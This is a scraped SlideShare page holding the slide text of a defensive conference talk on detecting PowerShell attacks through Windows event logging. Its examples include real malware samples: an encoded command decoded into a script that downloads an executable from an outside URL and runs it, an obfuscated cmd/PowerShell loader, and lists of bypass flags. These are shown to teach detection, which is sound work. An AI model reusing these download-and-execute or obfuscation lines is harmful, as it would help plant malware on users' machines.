bugcrowd
 
PPTX
Orange@php conf
Hash Lin
 
PPTX
Security in PHP - 那些在滲透測試的小技巧
Orange Tsai
 
From P0W3R to SH3LL
Arthur Paixão
 
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Daniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Proper logging can catch breaches like retail PoS
Michael Gough
 
PSConfEU - Building an Empire with PowerShell
Will Schroeder
 
Malware analysis _ Threat Intelligence Morocco
Touhami Kasbaoui
 
Hacke windows med windows - avanserte angrep
Oddvar Moe
 
Bsides tampa
Octavio Paguaga
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Building APIs with MVC 6 and OAuth
Filip Ekberg
 
Weaponizing Recon - Smashing Applications for Security Vulnerabilities & Profits
Harsh Bothra
 
DEFCON 23 - Jason Haddix - how do i shot web
Felipe Prado
 
Columbus WordCamp 2015
Jason Packer
 
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
Michael Gough
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
Orange@php conf
Hash Lin
 
Security in PHP - 那些在滲透測試的小技巧
Orange Tsai
 
Ad

More from Michael Gough (10)

PDF
Hacking a backup power solution(s) for your home, Tornado tested!
Michael Gough
 
PDF
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
Michael Gough
 
PDF
My InfoSec journey led me to create my own IR tools, how, and why you should too
Michael Gough
 
PPTX
Incident Response Fails
Michael Gough
 
PDF
When Security Tools Fail You
Michael Gough
 
PDF
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
PDF
Cred stealing emails bsides austin_2018 v1.0
Michael Gough
 
PDF
Email keeps getting us pwned - Avoiding Ransomware and malware
Michael Gough
 
PDF
Email keeps getting us pwned v1.1
Michael Gough
 
PDF
Email keeps getting us pwned v1.0
Michael Gough
 
Hacking a backup power solution(s) for your home, Tornado tested!
Michael Gough
 
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
Michael Gough
 
My InfoSec journey led me to create my own IR tools, how, and why you should too
Michael Gough
 
Incident Response Fails
Michael Gough
 
When Security Tools Fail You
Michael Gough
 
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
Cred stealing emails bsides austin_2018 v1.0
Michael Gough
 
Email keeps getting us pwned - Avoiding Ransomware and malware
Michael Gough
 
Email keeps getting us pwned v1.1
Michael Gough
 
Email keeps getting us pwned v1.0
Michael Gough
 
Ad

Recently uploaded (20)

PPTX
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
PDF
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PDF
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
PDF
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
PDF
RAT Builders - How to Catch Them All [DeepSec 2024]
malmoeb
 
PDF
Per Axbom: The spectacular lies of maps
Nexer Digital
 
PDF
introduction to computer hardware and sofeware
chauhanshraddha2007
 
PDF
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
PDF
Researching The Best Chat SDK Providers in 2025
Ray Fields
 
PPTX
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
PPTX
Farrell_Programming Logic and Design slides_10e_ch02_PowerPoint.pptx
bashnahara11
 
PDF
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 
PDF
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PPTX
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
PDF
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
PPTX
AVL ( audio, visuals or led ), technology.
Rajeshwri Panchal
 
PDF
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
PDF
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
NewMind AI Weekly Chronicles – July’25, Week III
NewMind AI
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
RAT Builders - How to Catch Them All [DeepSec 2024]
malmoeb
 
Per Axbom: The spectacular lies of maps
Nexer Digital
 
introduction to computer hardware and sofeware
chauhanshraddha2007
 
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
Researching The Best Chat SDK Providers in 2025
Ray Fields
 
Agile Chennai 18-19 July 2025 | Workshop - Enhancing Agile Collaboration with...
AgileNetwork
 
Farrell_Programming Logic and Design slides_10e_ch02_PowerPoint.pptx
bashnahara11
 
How ETL Control Logic Keeps Your Pipelines Safe and Reliable.pdf
Stryv Solutions Pvt. Ltd.
 
Peak of Data & AI Encore - Real-Time Insights & Scalable Editing with ArcGIS
Safe Software
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
Agentic AI in Healthcare Driving the Next Wave of Digital Transformation
danielle hunter
 
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
AVL ( audio, visuals or led ), technology.
Rajeshwri Panchal
 
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 

BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1

  • 1. PowerShell post-exploitation, PowerSploit, Bloodhound, PowerShellMafia, Obfuscation, and PowerShell Empire, the Empire has fallen, you CAN detect PowerShell exploitation Michael Gough MalwareArchaeology.com MalwareArchaeology.com
  • 2. Who am I • Blue Team Defender Ninja, Malware Archaeologist, Logoholic • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet”, “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet”, “Windows Splunk Logging Cheat Sheet” “Windows PowerShell Logging Cheat Sheet”, “Malware Management Framework” And just released “Windows Advanced Auditing Cheat Sheet” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool – With @Boettcherpwned – Brakeing Down Security PodCast • Co-host of “Brakeing Down Incident Response” podcast • @HackerHurricane also my Blog MalwareArchaeology.com
  • 4. PowerShell Exploitation • Malware loves to use PowerShell to download and launch payloads – They try and hide it too • Red Teamers love PowerShell – They love to hide too – It is already built into the OS • But they DO make noise and CAN be detected – If you know how MalwareArchaeology.com
  • 5. So where do we start? MalwareArchaeology.com
  • 7. What is set? What version? • What version PowerShell you running? • Is PowerShell logging enabled? • Are you using a PS v2 profile.ps1 to set logging? • What is your Execution Policy? • How can you check? MalwareArchaeology.com
  • 9. Audit with LOG-MD • We give you a report MalwareArchaeology.com
  • 11. PowerShell has Logs! • You MUST enable them, not configured by default ;-( • “Windows Logging Cheat Sheet” (CMD LINE) • “Windows PowerShell Logging Cheat Sheet” – Follow the guidance – MalwareArchaeology.comcheat-sheets • Module Logging • ScriptBlock Logging • Transcripts if you want • Profile.ps1 for PS v2 – nop (no Profile) will bypass this ;-( MalwareArchaeology.com
  • 12. PLEASE UPGRADE • For the love of NOT getting pwned… • Upgrade to PowerShell v5 • FYI – PS v6 is out and renamed the binary to pwsh.exe • So update all the queries to look for BOTH PowerShell and Pwsh • PS 5 & 6 has logging that can’t be bypassed as easily like v2, 3 and 4 with the –nop (NoProfile) MalwareArchaeology.com
  • 14. What is Malware Using? • LOTS of PowerShell – In most, if not all malware we see – Hearing it a lot in targeted attacks – Living off the land, all the files are already there – Just add script/commands and run • PenTesters, The RED TEAM also loves them • There are LOTS of PS post-exploit kits • You will hear the term “Non-Malware” attacks MalwareArchaeology.com
  • 15. Exploit Kits • PowerSploit • PowerShellEmpire • EmpireProject • BloodHound • PSRecon • PowerShell-Suite • PowerTools • Powershell-C2 • PSAttack • And more… MalwareArchaeology.com
  • 16. 4688 – PowerShell Bypass In the Security Log MalwareArchaeology.com
  • 17. They do this to hide what you see • 4688 will capture this behavior • Stops profile.ps1 from loading in case there is any logging set inside it, hide the window, and ignore any execution policies • YAY Microsoft.. Allows built-in bypasses • LOTS of way to spell the bypasses MalwareArchaeology.com
  • 18. PowerShell Bypasses • -W Hidden (Hide the window YOU see) • -NoP –sta –NonI –w hidden (no Profile, Hidden, Non-Interactive) MalwareArchaeology.com
  • 19. Security Log - 4688 PowerShell Web Calls MalwareArchaeology.com
  • 20. Fetch !!! • The malicious payload must phone home to get the dropper • System.Net.WebClient • DownloadString and/or http • -Enc or Encoded • There are lots of ways to spell PS commands ;-( MalwareArchaeology.com
  • 21. Base64 Encoded • New way to hide from the “Process Command Line” 4688 event – No bypass words to check for… Silly hackers… It is still easy to spot • POWeRshEll -enCodedCOMmaNd – ZgB1AG4AYwB0AGkAbwBuACAAaQBlAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHM AdwBzAGUAZgAgACgAIAAkAFgARABKAFEAaABXAGYAcQBWAHUAWABvAFIASQAgACwAIAAkAHMAYgBUAGYA TwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH MAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpA GwAZQAoACAAJABYAEQASgBRAGgAVwBmAHEAVgB1AFgAbwBSAEkAIAAsACAAJABzAGIAVABmAE8AVAB0AG 0ASgBzAGkARQBZAFYAWQB4ACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZ QBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIA AkAHMAYgBUAGYATwBUAHQAbQBKAHMAaQBFAFkAVgBZAHgAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgB rAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEgAWQBs AFoAYgBVAFcAZwBGAHYAUABZAGkAZwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAn AFwASwBkAG0ATwBiAFEAWgBWAEIAeQBRAHAAdgBCAFMAUQBpAHoAcAAuAGUAeABlACcAOwANAAoAaQB lAFcATABkAFcAQQB3AHQASABpAEYAZABmAEMAUwBPAHMATQBiAHMAdwBzAGUAZgAgACcAaAB0AHQAcA BzADoALwAvAGMAbwBtAGYAeQAuAG0AbwBlAC8AeQBiAG4AdwBpAGYALgBqAHAAZwAnACAAJABIAFkAbAB aAGIAVQBXAGcARgB2AFAAWQBpAGcAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= MalwareArchaeology.com
  • 22. Manual Translation • On a website MalwareArchaeology.com
  • 23. PowerShell Log - 4104 Module Logging MalwareArchaeology.com
  • 24. Translated… Fetch • function ieWLdWAwtHiFdfCSOsMbswsef ( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx ){(New-Object System.Net.WebClient).DownloadFile( $XDJQhWfqVuXoRI , $sbTfOTtmJsiEYVYx );(New-Object -com Shell.Application).ShellExecute( $sbTfOTtmJsiEYVYx ); } • try{ • kill -processname EXCEL; • $HYlZbUWgFvPYig=$env:USERPROFILE+'KdmObQZVByQpvBSQizp.exe'; • ieWLdWAwtHiFdfCSOsMbswsef 'https://comfy.moe/ybnwif.jpg' $HYlZbUWgFvPYig; • }catch{} • Catch it as a PS 4104, not a Process Create 4688 MalwareArchaeology.com
  • 25. PowerShell Decodes for you !!! • 4104 event will decode any –Encoded, Base64 blobs • Module Load MalwareArchaeology.com
  • 26. Security Log – 4688 PowerShell Log – 4104 Windows PowerShell Log - 400 Obfuscation MalwareArchaeology.com
  • 27. Fetch !!! • They will try to hide or obfuscate their behavior to make it hard to read • To me, this makes no difference, except I can’t easily understand what they are doing • They will add plus“+” to add/connect variables • They will use ticks ‘ or ^ carats to break word checks • They will use dollar $ or percent % to designate variables • So look for the Odd Characters that indicate obfuscation! – You can thank Daniel Bohannon for this shtuff MalwareArchaeology.com
  • 28. Obfuscation – Odd stuff - 4688 • Becomes obvious very quickly.. This is BAD MalwareArchaeology.com Ticks Plus +
  • 29. Obfuscation – Odd stuff - 4104 • Now you can’t look for words, so adapt MalwareArchaeology.com Lots of special characters, some normal for PS
  • 30. Even older PowerShell v2 Event ID 400 • Look for odd characters • Count of characters are very telling once isolated or extracted from the blob MalwareArchaeology.com
  • 31. 4688 - Process Create Security Log MalwareArchaeology.com
  • 32. Typical Malware launching PowerShell 1. User launches MS Word 1. Calls CMD.exe 1. Calls PowerShell and downloads dropper 1. Calls Malware 1. Calls 2nd copy of Malware MalwareArchaeology.com
  • 33. This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAUQB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1ADMAMQBiADkAMQAzADUAYwBiAD EAZAA2ADMAMgA5AGIANABhADQAZQA1ADUAZgA1ADMAZQA4ADYAZQBiADgAYQAyAGUAZgA3ADYANABkAGUANQBjADMAMQA3AGQAZgA5ADcAZABjAGUANwA4AGMAZAA4AD kAOAA0ADAAOQA4ADgANAA2AGUAYgA0ADAAMQA3ADUAYgA5AGMANwAwAGEANgA3ADIANQAyADEANgBmADQAZQA3ADcAZgA4ADMAMABkAGMAOABhAGQAOQA2AGIAZQAx AGMAZQBhADYAMwAxAGUAMQAzAGEANQA0ADgAYwBmADMAMQA1ADgANAAyADEAOABiAGQAOABjADAAOAAzAGUAOQA3ADIAYwA4AGIAZgBhADAAMQA1ADkAYQBjAGMAN ABlAGUAMABlAGUAMQBjADcAZQBhADMAZQBlAGEAMQBlADkANABkADYAOAAzAGEAYQA3ADcAMQBiADQAYwA5AGUANgBkAGMAYQBmADkANAA5ADYAMgBiADYAYwBkADMA OQA3ADEAZgA1AGYAYwBjADAAZQBiAGQAOAAzADQAOAA4AGMAZQA3AGMAZABjAGIAYQBiAGYAZAA4ADgAOQBiADgAOAAyADcANwAwADcANAA0ADIAZAAyADMAZQAwADMAO QBlADUANQA1ADUAMQBiADUAZgAxADgAOAA1ADcANgA5ADMANABkADkANAAzADUANwAzADgAOQA3ADAAMABiAGUAMwBiAGYAMwA1ADEAMQBiAGEANgBiADYAYgAwADUA NQAxAGUANAA3ADUAMgBjAGUANAA4ADgAYQBiADYAMQA3ADUAOQBkADEAZQA1ADUANAA3ADUANwA2ADYAOABlADgANwBmAGMAMQAzADQANwBmAGEANgA4AGUAMwA0 ADAANwBmADAANQBiADkANwAyAGEANAA3ADIAZAA3AGIAMgAxADYAYwBmADAAMwA0ADYAYwA2ADYAYgAxADkAMQA3AGUAYgA0ADkAOABiADUANgAyADgAMQBmADQAYgA 2ADYAMQAyAGMAOQAxAGEAOQA5AGEANQBiADcAYgBhAGQAYgA1ADgAZQBiAGMAZgA4AGEAMQA2ADAANgAzADkAMwBjAGIAMgA4ADcANwA3ADIANAAxADcANgAwADEAZQA2 AGQAMwBiAGYAMgBhADEAMQAxADMAYQAyAGUAOQBmADIAYgA4AGUAZQA0ADUAMwBmAGYAYwAzAGIAMABiAGMAYwAyADYANQBmADcAMgAzAGUAYgBmAGQAYgA1ADQA OAAwADEANAA3ADcAZgAyAGQAZAA4AGUAYgBhAGYAOQA1ADMAMgA5AGEANgA2ADQANwAwAGUANwAzADMAZQBlADgAMgBjAGEAYwAzAGQAOQBhADQAYQA4ADAAMgAwA GQAOABkAGMANwAxADAANQA5ADEAYwBkAGIAYgA4ADMANgAwADYAZQBkAGYAMAA4ADgAMwBmADUANABhAGYAOABmADgANQAyADAAMQA4ADYAYwAxADMAMQBiADkAZ gA4AGIAZQAzADQAZgA5AGYAMQBkADcAOQA4AGIAZgAxADcAOAAxADMAOAA5ADEANQAxAGQAYQBjADIAYwAxADcAMAAwADEANwAzADgAMQA4ADgAMgA0ADMAMwBmADMA ZQBkADUAMAA4ADYAYQBiADIAYgAxAGEAYgA3ADMAMAAxADAAMABhADIAYwA1AGYAZgA0ADkAYgBiADkANwBjAGMANwBkADgAMQAzADUAMAAxADAAZQBmAGEAMQAyADQA OQBhAGMAMQBkAGYAZgBjAGEAZgBiADYAMAA2ADUAOABhAGYANwAzADEAOQAzADEAZQBhADUANwA4AGMAYQBmADEANwAxADEAOAA1ADgANgA0ADkANABjADYAMABkAGU AYgA2AGUAMQBlAGIAMgA5ADkAYQAwADAANgA1ADAANgAxADYANgBkADUAYwA2AGIAYgAyAGYAMAA0ADYAYgBlADAANwA1AGQAOQAxADcAOABmAGMAOAA2ADEAMQA4ADc AMAA3ADcAYwA0AGUAYgA2AGIAOQAyADMAYgBhADgAMQBlADAAOQA3ADgANgBkAGIAYwA4ADEAMgA2ADQAZgA5AGMAOQAwAGYAZAAwADQAYQBkAGUAOAA1ADkAZQBlAD UANwA2ADgANAA4ADkANQBiADgAMgAzADMAMgAwAGUAYgA1ADMANQBiAGUANAA5AGMAYgA4ADAAYQA4AGQANABiAGEAMwA1ADQAMwBhADAAMQA3AGYAYwAwADMAY wA3ADEAYwAyADQAZQBlAGMAOQBmADkAMgA0AGMAYQAyAGMANgA2AGQAOABlADQAOAA5ADUAMwBjADQAZABkADIAZQA2ADQAYQAzADgANAAxADcAOABmAGMAMABhAG QANgAyADIANwA4ADQAYQA2AGYANABiADgAMQA4ADcAYgAwADgAZABmADgAMQA0AGMAYwBhADcAYgBlAGEAOQAyADcAMgBiADcAOAAxADkAMQBiADcAZAAwADUANgA0AG QAMwAzAGYAMQBjADgAOQBiAGUAZQA3ADgAZAAxAGIANwA1AGMAMQA2ADIAOQAyADMAMAA3ADcAZgA4ADEAZAAyADQAZABkAGUANwBlAGYANAA1ADAANABkADUAMgAxA DEANgAxADgAZQBjAGUAMwBlADUAMQAyADgANABlADEANwA4ADYAZABlADIAMgA5ADAAYgAwADYANAA2ADAAZQA2ADIAMQBlADQAYwA5ADAAZAA0ADgAOAA4ADgANgA5ADc ANAA2ADMAYwBjADIAOABlADYAYwBiADYAMwA2AGUAMAAxADEAZgA2AGMAYgAzAGUANwBjADIAMABmADcANgAwADgAMgA4AGYAZAA5ADgAOQBjADMAZgBiAGUAYgA4ADkA MQA4AGIANwA2ADYAYgBhAGMAMQA4ADUAMAAwADMAMQAyADEAYQA2ADUAMQBhADQANABlADAAMQA5AGYAZQAxADcAZgBjADIANQBjADgANgA3ADUAOQA0ADIANwA4AD cAYgA1ADUAYgA0ADAANAA0ADkAMgBhAGMAZQBmAGEAZAAwAGEAZQBjAGIAMQBkAGEAMwAzADEAMABlADMAOQAyADAAZABkADMAMQA1ADQAMgA4ADEAMABlADQAZgAx AGIAZAAyADkAZgA2ADIAMwBkADAAMgBjAGQAYgBlADYAMgBkADEAYwBjADMAMwBhADUANgA2AGIAMQA1ADMAYwA3ADMANQA4AGEAYwAyADkAOAA3AGUANQBmAGYAOAA 3ADMAZQA1AGMAOQBkAGQAYwBiADcAMQA1ADAANwAwAGUAYwAwAGIANAA3ADQANwAwADMAMAA2ADEAOQAxADcAOAA0AGUANQA4ADgANgBlADAANQA3AGQANwAxAGI ANAAyAGQANgA2ADUAOQA0ADkAMAA1ADkANQBkADQAZgBhAGUANAAzADUANQA4ADQAMwBkAGIAMwBhAGQAZgA5ADEAYgA3ADcAMABhADMAYQA2AGUAYQAwADkANwAx AGMAYQA3AGIANAAwADkANgA2AGYAMQA1ADcANQA1AGMAYQA3AGYAMQA2AGIANgAyADAAMAA4ADEAYgAwADcAZQBhADUAYQBjAGQAOQBhADUAZgAzAGMANQBiADIANQA yADQAOAA2ADgANwA0ADgANgAyADIAYwAxADQAYgBlADgAZAA3ADUANAA5AGQAZQA5ADkAMAAwADkANwBjADcAMABkAGQAMgBiADcAMABiADEAYwBjADAANgBkADIAYgA4A DYAMQAyADUAMgA2ADgAMAA0AGEAYQBlAGMANAAxADUAZQAxADEAOAAzADgAZgA0ADIAMgA3ADEAYQBiAGYAOABhADAAMgBiADkANwA0ADMAOQAwAGQAMgA2ADMAYwB kADYAYQA4ADAANgA1ADgAMgBlAGEANwA3AGQAMQAwADQAYQBhAGQAOABlADgANQBlAGMAZQA1ADAAZABkAGIANQAwAGEAYgBmAGMAOAAzADAAMwBlADUAMgBiADYAY wBiAGMAMwBjADAAZAAzADEAZQBiAGMAYwAxAGMAMgBjADAAMwAzADEAMgAzAGYAYwBkAGMANgA1AGMANwA0AGUANQA4ADYAMQA5AGYAZAA0ADgAMQA3AGUANQA4A DUANwBlADgAZQAxAGUAOQA1AGMAZgBjAGQAMwBkADMAZgBmADgAMwBjADEAMAA4ADgANAA5ADMAYwBmADAAMAAzADUAYwBkADEAZAAxADkAMAAxADYANgA4ADgAMQ A5AGIAOQBiADkAMwAzADUAMgA4ADAAOAAxAGQAZQBkAGEAYwA0ADIAMwBiADUANAAwADQAMgAzADMANwBlAGEAZQA4ADgAMgAwADEAYQAyAGQAMAA2AGYAZQA3ADYA YQAwADEANQBjAGUAZQA5ADAAMABkAGMAMAA2AGIAZQBhADAANwBiADQAMQBjADAAZQAyAGUAOQAyADAAZgAyAGUAYgBmADQANAA0ADIAZAA2AGYAOAAwAGUAYQA3AD kANwA1ADcAOABjADUANgA0ADAANgAwAGYAYgA0ADUANwBjAGYAOAAxADUAOAA1AGUAZAA5ADEANABjADAAMAAyADcAOAA5ADIAZQBiAGQAMABlADUAMAA2ADkAZAAyADc AMwAxAGEAOAA4ADcAZQA1AGIAMAAzADcAYgBiAGQAMABjAGYAOAA0ADQAYQAyADEANwA0ADAAYgA2AGMAMgA4ADMAOQAxAGIAOQBmADMANgBlADQAMABjADAAMQA1A DYAYgA4ADQAMwA5AGMANwBhADYANABhAGUAYgA3ADUAZgBmAGYAMgBhADAAYQBiAGQAZQA3ADUAZgBiADMAMQA4ADcAMQA5AGYAZAAyADkAZAAxAGMANQA3AGEAYgA wADcANAA2AGUAMQA1ADEAYQBlAGMAZgAwAGMAZAA0ADQAYgAwAGQAMwA2ADAAMQBhAGEAYQA4ADkAZgBhADEAMwBjADAANQA3ADgANgAyAGQAMQAxAGIAZgA2AGMA NQBhADkAOABhADIAOAA0AGEANgBhADIAYgBkAGYAYQBhAGUANwA0AGYAOQBjADAAZABkADMAYwBiADAAZgBjAGIAMgAyADUAMgBiADEAZgA1ADcAMQAxAGEAYwAxAGMANw A3ADIANQAxADgAOAAxAGUAYQAxAGQAZQBkADAAMQA3ADEAZAAwADcANQA0ADcAMAAxADIANgAzADcAMgBiADcANwBkADgAMQAyAGQAYgBiAGEAZAA4ADEAZgAzADgAZABk ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 34. This PowerShell looks odd • cmd jwaMLXnC iTahsHIpaITIFJCDLrOwoC XwSDfYdvV & %C^om^S^pEc% %C^om^S^pEc% /V /c set %LkOzPNSShSlqiXU%=HkMCjGoAjaAcJ&&set %var1%=p&&set %var2%=ow&&set %AhUBjnMNLHEFDPI%=pRLBAwJEiiE&&set %var7%=!%var1%!&&set %vNQpMqIhkQoukIa%=cHwdrjXtIoaIBY&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %QSAiRAvRrPuhXMB%=ataDjzmFNO&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "(nEW-ObJECT ManAGEMEnT.AuToMATIoN.PsCReDEntIAl ' '. ( '76492d1116743f0423413b16050a5345MgB8AGYAZgB2AFEAYgBtAEwAU QB5AEUAbgAwADkAUQA3AFkAUQBuAEcAVwBxAHcAPQA9AHwANAA1 ADMAMQBiADkAMQAzADUAYwBiAD – 42 more lines of Script Block code • ADcAZAA2ADcANQA5AGYANwBiADMA'|CONVerttO-SecuresTrInG -ke 150.105.213.121.221.126.137.121.68.30.46.202.28.13.28.138 ) ).gETNEtwORkCrEdeNTIaL().pasSwoRD|.((vAriabLE '*mdR*').NAME[3.11.2]-JOin'') MalwareArchaeology.com
  • 35. Did that look normal? • 4688 will show you the Process execution – What called what • What called PowerShell, and the parents above – Word > CMD > PowerShell = Always BAD • What did PowerShell logging catch? – That big blob looked interesting MalwareArchaeology.com
  • 36. 4104 - PowerShell Script Block Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
  • 37. Script Blocks are labeled MalwareArchaeology.com
  • 38. Then you will see this in the logs • It is not translated, just recorded • But they are LARGE – You can trigger on say > 1000 characters – You can see this one will also trigger Obfuscation MalwareArchaeology.com
  • 39. This is a normal Script Block MalwareArchaeology.com
  • 40. Do they look the same? MalwareArchaeology.com Readable NOT Readable Obfuscated
  • 42. 4104 - PowerShell Module Logging Microsoft-Windows-PowerShell/Operational Log MalwareArchaeology.com
  • 43. WARNING !!!! MalwareArchaeology.com • PowerShell does have a WARNING if something is odd • Trigger Alerts on these too • 4104
  • 44. WARNING !!!! • The Remote Command along with all this… = BAD MalwareArchaeology.com
  • 45. WARNING !!!! • And the raw log MalwareArchaeology.com
  • 46. WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
  • 47. WARNING !!!! • And you can see translation in Event ID 4100 MalwareArchaeology.com
  • 48. 4100 – Executing Pipeline • Can see some translation occurring MalwareArchaeology.com I can read this NOT this
  • 49. PS v2 - 500 Events • Windows PowerShell MalwareArchaeology.com
  • 50. PS v2 200 Events • Command Health MalwareArchaeology.com
  • 52. Filtering out the good, to find the bad • PLEASE put a Mark/Sign/Secret Key in your scripts MalwareArchaeology.com
  • 53. Code your PowerShell for exclusion • Make the scripts excludable on obvious things YOU or your company does or knows • The path is awesome – All scripts excluded by path alone • Names, Secret Code, Key – Have your scripts contain something only you know that is a ‘secret key’ to exclude by • Or.. Sign your PS scripts MalwareArchaeology.com
  • 54. Once you create these queries MalwareArchaeology.com
  • 55. Create Email Alerts • Trigger on PS launching • Tweak and filter out known good – Get your developers to mark their code!! MalwareArchaeology.com
  • 56. PowerShell Log Goodness • Enable the logs per the Cheat Sheets • PS v2 Logs (even if you have PS v5) – Collect Event ID 200, 400, and 500 – Windows PowerShell • PS v5 v6 Logs (maybe v4 if you hack it) – Collect 4100, 4104 – Microsoft-Windows-PowerShell/Operational • Windows Logs – Collect 4688 – WITH Process Command Line MalwareArchaeology.com
  • 57. Security Log Event ID - 4688 • PS executed • PS Bypass executed • PS Suspicious buzzwords • PS Count Obfuscation Characters (‘ + $ % ;) • You can look for large Scripts Blocks and Base64, but use the PS logs for this MalwareArchaeology.com
  • 58. PowerShell v2 • 200 – Command Health – WARNING, will give you some translation • 400 – Engine Lifecycle – What executed • 500 – Command Lifecycle - What executed and the command line if using profile.ps1 – and if “No Profile” (-nop) is not bypassed MalwareArchaeology.com
  • 59. PowerShell v2 Event IDs - 200 and/or 400 • PS Web Call • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
  • 60. PowerShell v5 & v6 • 4100 – Executing Pipeline - WARNING • 4104 – Execute a Remote Command – WARNING and Verbose • No Obfuscation here, stripped out as it is executed, so you get clean code • That big Base64 blob… now it is readable MalwareArchaeology.com
  • 61. PowerShell v5 & v6 Event IDs - 4100 and/or 4104 • PS Web Call • PS Suspicious Commands (buzzwords) • PS Count Obfuscation Chars (‘ + $ % ;) • PS ScriptBlock by size (> 1000) • PS Base64 blocks • PS WARNINGS MalwareArchaeology.com
  • 62. Sysinternals Sysmon Service • You can catch Not-PowerShell PowerShell execution • Event ID 7 – Module loads – Look for Process that is calling System.Management.* DLLs • And all the other cool stuff Sysmon collects MalwareArchaeology.com
  • 63. Summary • Enable PowerShell logging ! – Use the Cheat Sheets • LOG-MD will check your system and report – Use it to evaluate malware too • Create Reports and Alerts for the items discussed • Maybe add Sysmon on a few systems for ID 7 • Use the “Windows Splunk Logging Cheat Sheet” for some examples of what was discussed • Send us your improvements and tweaks !!!! • But START LOGGING POWERSHELL !!!! MalwareArchaeology.com
